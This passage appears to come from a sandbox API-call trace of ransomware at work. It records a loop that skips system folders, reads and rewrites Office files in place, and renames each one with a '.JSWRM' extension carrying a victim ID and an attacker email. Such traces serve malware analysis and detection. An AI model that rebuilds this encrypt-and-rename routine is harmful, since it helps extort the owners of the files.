lpString2=".") returned 1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="..") returned 1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="...") returned 1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="windows") returned -1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="recovery") returned -1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="perflogs") returned -1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="documents and settings") returned 1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="system volume information") returned -1 [0119.767] lstrcmpiW (lpString1="PDIR4B.GIF", lpString2="msocache") returned 1 [0119.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR4B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0119.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR4B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0119.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.769] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10753) returned 1 [0119.769] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a00) returned 0x24e1d8 [0119.769] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2a00, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2a00, lpOverlapped=0x0) returned 1 [0119.771] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.771] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2a00, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2a00, lpOverlapped=0x0) returned 1 [0119.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.771] CloseHandle (hObject=0x314) returned 1 [0119.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0119.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0119.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0119.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.772] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0119.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.773] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76cd, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR4F.GIF", cAlternateFileName="")) returned 1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2=".") returned 1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="..") returned 1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="...") returned 1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="windows") returned -1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="recovery") returned -1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="perflogs") returned -1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="documents and settings") returned 1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="system volume information") returned -1 [0119.773] lstrcmpiW (lpString1="PDIR4F.GIF", lpString2="msocache") returned 1 [0119.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0119.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR4F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0119.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0119.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR4F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR4F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0119.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0119.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.775] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=30413) returned 1 [0119.775] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76c0) returned 0x24e1d8 [0119.775] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x76c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x76c0, lpOverlapped=0x0) returned 1 [0119.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.779] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x76c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x76c0, lpOverlapped=0x0) returned 1 [0119.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.780] CloseHandle (hObject=0x314) returned 1 [0119.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0119.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0119.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0119.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.780] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR4F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir4f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0119.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0119.781] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1001, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR50B.GIF", cAlternateFileName="")) returned 1 [0119.781] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2=".") returned 1 [0119.781] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="..") returned 1 [0119.781] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="...") returned 1 [0119.781] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="windows") returned -1 [0119.781] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="recovery") returned -1 [0119.781] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="perflogs") returned -1 [0119.782] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="documents and settings") returned 1 [0119.782] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.782] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="system volume information") returned -1 [0119.782] lstrcmpiW (lpString1="PDIR50B.GIF", lpString2="msocache") returned 1 [0119.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0119.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR50B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0119.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0119.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR50B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0119.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.783] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4097) returned 1 [0119.783] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1000) returned 0x24e1d8 [0119.783] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1000, lpOverlapped=0x0) returned 1 [0119.785] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.785] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1000, lpOverlapped=0x0) returned 1 [0119.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.785] CloseHandle (hObject=0x314) returned 1 [0119.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0119.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0119.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0119.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.785] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0119.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.786] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe82, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR50F.GIF", cAlternateFileName="")) returned 1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2=".") returned 1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="..") returned 1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="...") returned 1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="windows") returned -1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="recovery") returned -1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="perflogs") returned -1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="documents and settings") returned 1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="system volume information") returned -1 [0119.787] lstrcmpiW (lpString1="PDIR50F.GIF", lpString2="msocache") returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0119.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR50F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0119.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 